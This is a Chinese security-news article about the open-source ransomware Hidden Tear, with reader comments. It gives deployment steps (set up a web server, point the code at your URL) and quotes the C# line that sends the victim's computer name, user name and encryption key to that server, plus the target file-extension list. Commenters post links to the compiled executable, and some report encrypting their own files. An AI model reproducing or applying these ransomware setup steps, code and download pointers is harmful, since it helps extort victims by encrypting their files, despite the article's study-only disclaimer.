FreeBuf曾经报道过众多的勒索软件,而勒索软件的成本也越来越低。今年5月,暗网中曾出现过三步即可傻瓜化制作勒索软件的Tox工具,现在,GitHub上出现了一款开源的勒索软件Hidden Tear。
功能
使用AES算法加密文件
把加密密钥发送到某个服务器
被加密的文件可以通过密钥和解密软件解密
软件会在用户桌面创建一个文本文件,包含勒索信息(如:让受害者如何汇款等信息)
特色
软件仅有12KB
根据2015年8月15日的扫描结果,35款杀毒软件无一款检测出病毒。
演示视频
使用方法
你得要有一个web服务器,并且支持脚本语言,如php,python等。将此行修改成你的URL(最好使用https连接,防止窃听)
string targetURL = "http://www.utkusen.com/hidden-tear/write.php?info=";
脚本会将GET参数写入一个文本文件中,发送的进程则是在SendPassword()函数中
string info = computerName + "-" + userName + " " + password; var fullUrl = targetURL + info; var conent = new System.Net.WebClient().DownloadString(fullUrl);
你还可以修改会被加密的文件的后缀列表,默认列表为:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
实际上这款软件有很多地方仍需改进,比如软件所使用的AES加密是对称性的加密,并不适合勒索软件,但正是由于软件是开源的,大家可以不断完善它。
文中提及的部分技术和工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。
* 参考来源GitHub,vulture翻译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)
- 上一篇:从SQLMap踩坑到如何优雅地控制子进程
- 下一篇:优化SQLMAP的批量测试功能
不容错过
- 端午“擒马”记:黑产是如何强刷用户银行卡8.1万元的?豆芽菜2016-06-13
- 监控网络流量?支付宝安全控件“附赠”的可疑进程fu4k2014-08-02
- 《通天神偷》之溜进某电力公司服务器饭团君2016-06-03
- 以色列公司开发新型监控系统,可窃听全球手机饭团君2016-06-08
0daybank
已有 24 条评论
我就想要个Hidden Tear.exe
@ 过路人 https://anonfiles.com/file/bf83ca835ba284e81952901d6e0b2da9 文件给你!
@ 过路人 https://raw.githubusercontent.com/utkusen/hidden-tear/master/hidden-tear/hidden-tear/bin/Debug/hidden-tear.exe
你想勒索我
@ Fiend520 朋友,我点击之后,我文件被Locked了。怎么办!求助
全球首款开源勒索软件…高大上
以后一些特殊软件只能在虚拟机上跑了。
先测试下功能,学习学习
服务端的代码呢?
哦刚看懂,之接受computerName + "-" + userName + " " + password;这三个字段哈,那倒是很简单啊。
win中win….
吓到了。。
别的不说,居然无一杀软查出有毒,这点比较可怕,估计这些天杀软公司们要先加加班了。
这玩法杀毒软件确实没怎么注意,之前我做过一个DES加密的,360全家+电脑管家全程无视
开源就happy
= = 这代码写的,userDir赋值的时候没考虑XP,会BOOM的
小白点击之后,文件被加密了,怎么办,怎么破AES加密。泪崩,求助
@ 向日 逗~
@ lb867438587 求解咋办,当时就想测试下。。。
@ 向日 。。 刚刚还笑你来着。 。 我把我自己也玩死了 (;′⌒`)
@ 向日 https://github.com/utkusen/hidden-tear/tree/master/hidden-tear-decrypter
(;′⌒`)伤心 编译的时候 不小心按了F5 结果。。。。。。我日 坑爹啊啊啊 啊啊啊啊啊啊
@ jonyer https://github.com/utkusen/hidden-tear/tree/master/hidden-tear-decrypter
我现在还存着源码,需要可以联系我。顺便请求技术支持!QQ:1491533616